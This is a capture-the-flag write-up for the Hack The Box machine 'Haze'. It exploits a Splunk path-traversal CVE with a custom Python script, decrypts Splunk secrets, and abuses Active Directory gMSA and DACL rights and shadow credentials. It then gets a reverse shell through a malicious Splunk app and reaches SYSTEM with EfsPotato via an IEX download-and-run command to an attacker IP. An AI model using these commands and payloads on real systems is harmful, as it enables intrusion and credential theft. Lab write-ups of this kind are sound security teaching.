Haze

Recon

HTTP (8000)

80/443 is closed, but 8000 stands out with Splunk header.

splunkd discloses the version information on port 8089. There's 4 routes, but we don't have access to them without credentials.

Check for vulnerabilities for this version https://advisory.splunk.com/?301=/en_us/product-security.html

CVE-2024-36991 stands out because we are attacking Windows machine and severity is also High, other payloads may require authentication.

POC: CVE-2024-36991. TLDR: It's fucking os.path.join again, why can't people just use Pathlib

PoC works, but there's /etc/passwd which contains passwords on Windows???

└─$ git clone https://github.com/bigb0x/CVE-2024-36991.git -q
└─$ py CVE-2024-36991/CVE-2024-36991.py -u http://haze.htb:8000
[INFO] Log directory created: logs
[INFO] Testing single target: http://haze.htb:8000
[VLUN] Vulnerable: http://haze.htb:8000
:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:changeme@example.com:::20152
:edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1::Edward@haze.htb:user:Edward@haze.htb:::20152
:mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/:::user:Mark@haze.htb:::20152
:paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1:::user:paul@haze.htb:::20152

Make script more interactive with file of our choice.

from pathlib import Path
from argparse import ArgumentParser
import requests

parser = ArgumentParser()
parser.add_argument('-u', '--url', help='Target URL (e.g., http://example.com)')
parser.add_argument('-f', '--file', help='Target File')
parser.add_argument('-d', '--download', help='Download instead of print', action='store_true')

args = parser.parse_args()

## Relative
payload = payload = "/en-US/modules/messaging/C:../C:../C:../C:../C:..%s" % args.file
## Absolute
# payload = payload = "/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:..%s" % args.file

target = f"{args.url}{payload}"
print(f'Target URL: {target}\n')

resp = requests.get(target)
if '404 Not Found' in resp.text:
    print('File not found')
    exit(1)

if args.download:
    with open(Path(args.file).name, 'w') as f:
        f.write(resp.text)
else:
    print(resp.text)

hostname doesn't exist so passwd file is some decoy or smth

└─$ py lfi.py -u http://haze.htb:8000 -f /etc/hostname
Target URL: http://haze.htb:8000//en-US/modules/messaging/C:../C:../C:../C:../C:../etc/hostname
File not found

└─$ py lfi.py -u http://haze.htb:8000 -f /etc/passwd
Target URL: http://haze.htb:8000//en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd
:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:changeme@example.com:::20152
...

Splunk uses Linux like structure for storing the files, configuration and whatnot

https://docs.splunk.com/Documentation/Splunk/latest/Admin/Listofconfigurationfiles https://docs.splunk.com/Documentation/Splunk/latest/Admin/Wheretofindtheconfigurationfiles

server.conf: Contains a variety of settings for configuring the overall state of a Splunk Enterprise instance

└─$ py lfi.py -u http://haze.htb:8000 -f '/etc/system/default/server.conf'
...default splunk config..
└─$ py lfi.py -u http://haze.htb:8000 -f '/etc/system/local/server.conf'
Target URL: http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/system/local/server.conf

[general]
serverName = dc01
pass4SymmKey = $7$lPCemQk01ejJvI8nwCjXjx7PJclrQJ+SfC3/ST+K0s+1LsdlNuXwlA==

[sslConfig]
sslPassword = $7$/nq/of9YXJfJY+DzwGMxgOmH4Fc0dgNwc5qfCiBhwdYvg9+0OCCcQw==

[lmpool:auto_generated_pool_download-trial]
description = auto_generated_pool_download-trial
peers = *
quota = MAX
stack_id = download-trial

[lmpool:auto_generated_pool_forwarder]
description = auto_generated_pool_forwarder
peers = *
quota = MAX
stack_id = forwarder

[lmpool:auto_generated_pool_free]
description = auto_generated_pool_free
peers = *
quota = MAX
stack_id = free

authentication.conf: Toggle between Splunk's built-in authentication or LDAP, and configure LDAP.

└─$ py lfi.py -u http://haze.htb:8000 -f '/etc/system/local/authentication.conf'
Target URL: http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:..//etc/system/local/authentication.conf
...
[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_LDAP_Auth,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname

[authentication]
authSettings = Haze LDAP Auth
authType = LDAP

SplunkSecrets

To decrypt splunk secrets splunk command is required, but alternative is always there. Secrets file is required (https://community.splunk.com/t5/Knowledge-Management/What-is-the-splunk-secret-file-and-is-it-possible-to-change-it/m-p/331207)

└─$ pip install git+https://github.com/HurricaneLabs/splunksecrets.git
└─$ py lfi.py -u http://haze.htb:8000 -f '/etc/auth/splunk.secret'
Target URL: http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/auth/splunk.secret

NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD

└─$ py lfi.py -u http://haze.htb:8000 -f '/etc/auth/splunk.secret' -d
└─$ splunksecrets splunk-decrypt -S splunk.secret # bindDNpassword
Ciphertext: $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
Ld@p_Auth_Sp1unk@2k24

└─$ splunksecrets splunk-decrypt -S splunk.secret # pass4SymmKey
Ciphertext: $7$lPCemQk01ejJvI8nwCjXjx7PJclrQJ+SfC3/ST+K0s+1LsdlNuXwlA==
changeme

└─$ splunksecrets splunk-decrypt -S splunk.secret # sslPassword
Ciphertext: $7$/nq/of9YXJfJY+DzwGMxgOmH4Fc0dgNwc5qfCiBhwdYvg9+0OCCcQw==
password

Generate possible AD usernames and try passwords

└─$ namebuster 'Paul Taylor' > usernames.txt
└─$ netexec ldap dc01.haze.htb -u usernames.txt -p 'Ld@p_Auth_Sp1unk@2k24'
LDAP        10.129.31.43    389    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24

SMB (135)

SMB share is empty, but we can get valid users

└─$ netexec smb dc01.haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | tee rid-brute.log
└─$ grep 'User' rid-brute.log | awk '{print($6)}' | tee users.txt
HAZE\Administrator
HAZE\Guest
HAZE\krbtgt
HAZE\Domain
HAZE\Protected
HAZE\DC01$
HAZE\paul.taylor
HAZE\mark.adams
HAZE\edward.martin
HAZE\alexander.green
HAZE\Haze-IT-Backup$

Check password reuse

└─$ netexec smb dc01.haze.htb -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24' --continue-on-success
SMB         10.129.31.43    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
...
SMB         10.129.31.43    445    DC01             [+] HAZE\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB         10.129.31.43    445    DC01             [+] HAZE\mark.adams:Ld@p_Auth_Sp1unk@2k24
...

Bloodhound

Enumerate with Bloodhound.

└─$ bloodhound-python -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -ns 10.129.31.43 -dc dc01.haze.htb -c all --zip -op paul
...
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
...
└─$ sudo ntpdate haze.htb
CLOCK: time stepped by 28800.753143
└─$ echo $(( 28800.753143 / 3600 ))
8.0002092063888899
└─$ faketime -f +8h bloodhound-python -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -ns 10.129.31.43 -dc dc01.haze.htb -c all --zip -op paul
INFO: Found AD domain: haze.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 3 users
INFO: Found 32 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 18 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.haze.htb
INFO: Done in 00M 19S
INFO: Compressing output into 20250330174231_bloodhound.zip
└─$ faketime -f +8h bloodhound-python -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -ns 10.129.31.43 -dc dc01.haze.htb -c all --zip -op mark
INFO: Found AD domain: haze.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 8 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.haze.htb
INFO: Done in 00M 17S
INFO: Compressing output into 20250330174351_bloodhound.zip

Note: There was an error with Kerberos time skew, fix it with faketime to avoid any data loss.

From bloodhound it seems mark has more permissions then paul.

GMSA (mark.adams)

GMSA fails, so something must be preventing reading the value

└─$ netexec ldap dc01.haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa
LDAP        10.129.31.43    389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
LDAPS       10.129.31.43    636    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
LDAPS       10.129.31.43    636    DC01             [*] Getting GMSA Passwords
LDAPS       10.129.31.43    636    DC01             Account: Haze-IT-Backup$      NTLM:

Add-ADPermission fails because the command doesn't seem to exist

*Evil-WinRM* PS C:\Users\mark.adams\Music> Add-ADPermission -Identity (Get-ADServiceAccount -Identity "Haze-IT-Backup$") -User (Get-ADUser -Identity "mark.adams") -AccessRights GenericRead -Properties msDS-ManagedPassword

Get existing commands for ADServiceAccount manipulation

*Evil-WinRM* PS C:\Users\mark.adams\Music> Get-Command *-ADServiceAccount

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Cmdlet          Get-ADServiceAccount                               1.0.1.0    ActiveDirectory
Cmdlet          Install-ADServiceAccount                           1.0.1.0    ActiveDirectory
Cmdlet          New-ADServiceAccount                               1.0.1.0    ActiveDirectory
Cmdlet          Remove-ADServiceAccount                            1.0.1.0    ActiveDirectory
Cmdlet          Set-ADServiceAccount                               1.0.1.0    ActiveDirectory
Cmdlet          Test-ADServiceAccount                              1.0.1.0    ActiveDirectory
Cmdlet          Uninstall-ADServiceAccount                         1.0.1.0    ActiveDirectory

Inspect if you can read the value:

*Evil-WinRM* PS C:\Users\mark.adams\Music> Get-ADServiceAccount -Identity 'Haze-IT-Backup' -Property msDS-ManagedPassword

DistinguishedName : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
Enabled           : True
Name              : Haze-IT-Backup
ObjectClass       : msDS-GroupManagedServiceAccount
ObjectGUID        : 66f8d593-2f0b-4a56-95b4-01b326c7a780
SamAccountName    : Haze-IT-Backup$
SID               : S-1-5-21-323145914-28650650-2368316563-1111
UserPrincipalName :

Grant read permission and check the value again

*Evil-WinRM* PS C:\Users\mark.adams\Music> Set-ADServiceAccount -Identity "Haze-IT-Backup$" -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"
*Evil-WinRM* PS C:\Users\mark.adams\Music> Get-ADServiceAccount -Identity 'Haze-IT-Backup' -Property msDS-ManagedPassword

DistinguishedName    : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
Enabled              : True
msDS-ManagedPassword : {1, 0, 0, 0...}
Name                 : Haze-IT-Backup
ObjectClass          : msDS-GroupManagedServiceAccount
ObjectGUID           : 66f8d593-2f0b-4a56-95b4-01b326c7a780
SamAccountName       : Haze-IT-Backup$
SID                  : S-1-5-21-323145914-28650650-2368316563-1111
UserPrincipalName    :

Now we are able to read GMSA for Haze-IT-Backup

└─$ netexec ldap dc01.haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa
LDAPS       10.129.31.43    636    DC01             Account: Haze-IT-Backup$      NTLM: 735c02c6b2dc54c3c8c6891f55279ebc

HAZE-IT-BACKUP

OPSEC:

The computer HAZE-IT-BACKUP$@HAZE.HTB has the ability to modify the owner of the group SUPPORT SERVICES@HAZE.HTB.
Object owners retain the ability to modify object security descriptors, regardless of permissions on the object's DACL.

https://www.thehacker.recipes/ad/movement/dacl/grant-ownership

└─$ bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735c02c6b2dc54c3c8c6891f55279ebc" set owner 'Support_Services' 'Haze-IT-Backup$'
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by Haze-IT-Backup$ on Support_Services

https://www.thehacker.recipes/ad/movement/dacl/grant-rights

└─$ faketime -f +8h bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735c02c6b2dc54c3c8c6891f55279ebc" add groupMember 'Support_Services' 'Haze-IT-Backup$'
[+] Haze-IT-Backup$ added to Support_Services

└─$ bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735c02c6b2dc54c3c8c6891f55279ebc" add genericAll 'Support_Services' 'Haze-IT-Backup$'
[+] Haze-IT-Backup$ has now GenericAll on Support_Services

Note: Not positive why, but genericAll didn't work for mark.adams

Shadow Credentials

Update bloodhound data

└─$ bloodhound-python -u 'Haze-IT-Backup$' --hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -d haze.htb -ns 10.129.31.43 -dc dc01.haze.htb -c all --zip -op it

└─$ faketime -f +8h certipy-ad shadow auto -u 'Haze-IT-Backup$@haze.htb' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -account edward.martin -target haze.htb -dc-ip 10.129.31.43
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'edward.martin'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '2b7e5660-91c2-d80c-1d44-03984c7891a0'
[*] Adding Key Credential with device ID '2b7e5660-91c2-d80c-1d44-03984c7891a0' to the Key Credentials for 'edward.martin'
[*] Successfully added Key Credential with device ID '2b7e5660-91c2-d80c-1d44-03984c7891a0' to the Key Credentials for 'edward.martin'
[*] Authenticating as 'edward.martin' with the certificate
[*] Using principal: edward.martin@haze.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'edward.martin.ccache'
[*] Trying to retrieve NT hash for 'edward.martin'
[*] Restoring the old Key Credentials for 'edward.martin'
[*] Successfully restored the old Key Credentials for 'edward.martin'
[*] NT hash for 'edward.martin': 09e0b3eeb2e7a6b0d419e9ff8f4d91af

Can also be done with bloodyAD -> faketime -f +8h bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735c02c6b2dc54c3c8c6891f55279ebc" add shadowCredentials 'edward.martin', but certipy-ad is simpler.

You might want to execute commands quickly, because of HTB's 10 second cleanup rules..

faketime -f +8h bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735c02c6b2dc54c3c8c6891f55279ebc" set owner 'Support_Services' 'Haze-IT-Backup$'
faketime -f +8h bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735c02c6b2dc54c3c8c6891f55279ebc" add groupMember 'Support_Services' 'Haze-IT-Backup$'
faketime -f +8h bloodyAD --host "dc01.haze.htb" -d "haze.htb" -u "Haze-IT-Backup$" -p ":735c02c6b2dc54c3c8c6891f55279ebc" add genericAll 'Support_Services' 'Haze-IT-Backup$'
faketime -f +8h certipy-ad shadow auto -u 'Haze-IT-Backup$@haze.htb' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -account edward.martin -target haze.htb -dc-ip 10.129.31.43

WinRM (edward.martin)

└─$ netexec winrm dc01.haze.htb -u 'edward.martin' -H '09e0b3eeb2e7a6b0d419e9ff8f4d91af'
WINRM       10.129.31.43    5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
WINRM       10.129.31.43    5985   DC01             [+] haze.htb\edward.martin:09e0b3eeb2e7a6b0d419e9ff8f4d91af (Pwn3d!)

└─$ evil-winrm -i 'dc01.haze.htb' -u 'edward.martin' -H '09e0b3eeb2e7a6b0d419e9ff8f4d91af'
*Evil-WinRM* PS C:\Users\edward.martin\Documents> whoami /all
User Name          SID
================== ===========================================
haze\edward.martin S-1-5-21-323145914-28650650-2368316563-1105

Group Name                                  Type             SID                                         Attributes
=========================================== ================ =========================================== ==================================================
Everyone                                    Well-known group S-1-1-0                                     Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574                                Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                    Mandatory group, Enabled by default, Enabled group
HAZE\Backup_Reviewers                       Group            S-1-5-21-323145914-28650650-2368316563-1109 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

User.txt

*Evil-WinRM* PS C:\Users\edward.martin> cat Desktop/user.txt
69a27d7091c0a3a359b607b14a10069d

Privilege Escalation (alexander.green)

User is part of HAZE\Backup_Reviewers group and there's a Backups directory on root.

*Evil-WinRM* PS C:\Backups\Splunk> ls|%{$_.fullname}
C:\Backups\Splunk\splunk_backup_2024-08-06.zip
*Evil-WinRM* PS C:\Backups\Splunk> download C:\Backups\Splunk\splunk_backup_2024-08-06.zip

└─$ 7z x splunk_backup_2024-08-06.zip
└─$ find . -empty -delete
└─$ find . -name *.conf | grep -v default
./var/run/splunk/confsnapshot/baseline_local/users/admin/user-prefs/local/user-prefs.conf
./var/run/splunk/confsnapshot/baseline_local/apps/splunk_instrumentation/local/telemetry.conf
./var/run/splunk/confsnapshot/baseline_local/apps/splunk_httpinput/local/app.conf
./var/run/splunk/confsnapshot/baseline_local/apps/splunk_assist/local/assist.conf
./var/run/splunk/confsnapshot/baseline_local/apps/learned/local/props.conf
./var/run/splunk/confsnapshot/baseline_local/system/local/migration.conf
./var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf
./var/run/splunk/confsnapshot/baseline_local/system/local/server.conf
./var/run/splunk/merged/web.conf
./var/run/splunk/merged/server.conf
./etc/splunk-launch.conf
./etc/users/admin/user-prefs/local/user-prefs.conf
./etc/modules/distributedDeployment/classes/deployable/inputs.conf
./etc/modules/distributedDeployment/classes/deployable/outputs.conf
./etc/modules/distributedDeployment/classes/deploymentserver/deployment.conf
./etc/openldap/ldap.conf

└─$ cat ./var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf | grep bind
bindDN = CN=alexander.green,CN=Users,DC=haze,DC=htb
bindDNpassword = $1$YDz8WfhoCWmf6aTRkA+QqUI=

└─$ cat ./etc/auth/splunk.secret
CgL8i4HvEen3cCYOYZDBkuATi5WQuORBw9g4zp4pv5mpMcMF3sWKtaCWTX8Kc1BK3pb9HR13oJqHpvYLUZ.gIJIuYZCA/YNwbbI4fDkbpGD.8yX/8VPVTG22V5G5rDxO5qNzXSQIz3NBtFE6oPhVLAVOJ0EgCYGjuk.fgspXYUc9F24Q6P/QGB/XP8sLZ2h00FQYRmxaSUTAroHHz8fYIsChsea7GBRaolimfQLD7yWGefscTbuXOMJOrzr/6B                                                                                                                                                                      
└─$ splunksecrets splunk-decrypt -S ./etc/auth/splunk.secret
Ciphertext: $1$YDz8WfhoCWmf6aTRkA+QqUI=
Sp1unkadmin@2k24

Credentials don't work

└─$ netexec smb dc01.haze.htb -u 'alexander.green' -p 'Sp1unkadmin@2k24'
SMB         10.129.31.43    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.129.31.43    445    DC01             [-] haze.htb\alexander.green:Sp1unkadmin@2k24 STATUS_LOGON_FAILURE

Reverse Shell

We are not able to login into the machine, but we can login into Splunk as Administrator with admin:Sp1unkadmin@2k24

Secure Splunk Enterprise service accounts: On Windows, the Local System user is often the best choice to run Splunk Enterprise.

└─$ git clone https://github.com/0xjpuff/reverse_shell_splunk.git -q
└─$ cd reverse_shell_splunk # DONT FORGET
└─$ cp /opt/scripts/shells/ConPtyShell/Invoke-ConPtyShell.ps1 .
└─$ echo 'Invoke-ConPtyShell 10.10.14.77 4444;' >> Invoke-ConPtyShell.ps1
└─$ serve # Http server

└─$ stty raw -echo; (stty size; cat) | nc -lvnp 4444 # Listener

└─$ tar -cvzf letmein.tgz reverse_shell_splunk
└─$ mv letmein.tgz letmein.spl

Apps > Manage Apps

Install app from file

Upload malicious app

Change Sharing to All Apps (system)

After waiting for a minute nothing makes a callback 🤔

I made a mistake of not going inside directory; reverse_shell_splunk module is inside the git repository, git repository is not the module 😓 (Command above updated, so ignore)

PS C:\Windows\system32> whoami /all
User Name            SID
==================== ===========================================
haze\alexander.green S-1-5-21-323145914-28650650-2368316563-1106

Group Name                                 Type             SID                                         Attributes
========================================== ================ =========================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                     Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574                                Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6                                     Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                    Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0                                     Mandatory group, Enabled by default, Enabled group
HAZE\Splunk_Admins                         Group            S-1-5-21-323145914-28650650-2368316563-1108 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

Privilege Name                Description                               State
============================= ========================================= ========
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

SeImpersonatePrivilege

SeImpersonatePrivilege is useful for privilege escalation -> https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.html#seimpersonateprivilege

└─$ curl -LOs https://github.com/zcgonvh/EfsPotato/raw/master/EfsPotato.cs

PS C:\Windows\system32> cd ~/Music
PS C:\Users\alexander.green\Music> curl.exe 10.10.14.77/EfsPotato.cs -O
PS C:\Users\alexander.green\Music> ls C:\Windows\Microsoft.Net\Framework -rec -fil csc.exe | %{$_.FullName}
C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe
PS C:\Users\alexander.green\Music> C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe .\EfsPotato.cs -nowarn:1691,618

PS C:\Users\alexander.green\Music> .\EfsPotato 'whoami'
nt authority\system
PS C:\Users\alexander.green\Music> .\EfsPotato 'powershell -c IEX(IWR 10.10.14.77/Invoke-ConPtyShell.ps1 -UseBasicParsing)'

`nt authority\system` Shell

└─$ stty raw -echo; (stty size; cat) | nc -lvnp 4444
...
PS C:\Users\alexander.green\Music> whoami
nt authority\system
PS C:\Users\alexander.green\Music> cat /Users/Administrator/root.txt
27a454a7ca839375af60d82d4e1e520a

PreviousEscapeTwo NextTheFrizz

Last updated 7 months ago

hashtagRecon

hashtagHTTP (8000)

hashtagSplunkSecrets

hashtagSMB (135)

hashtagBloodhound

hashtagGMSA (mark.adams)

hashtagHAZE-IT-BACKUP

hashtagShadow Credentials

hashtagWinRM (edward.martin)

hashtagUser.txt

hashtagPrivilege Escalation (alexander.green)

hashtagReverse Shell

hashtagSeImpersonatePrivilege

hashtagnt authority\system Shell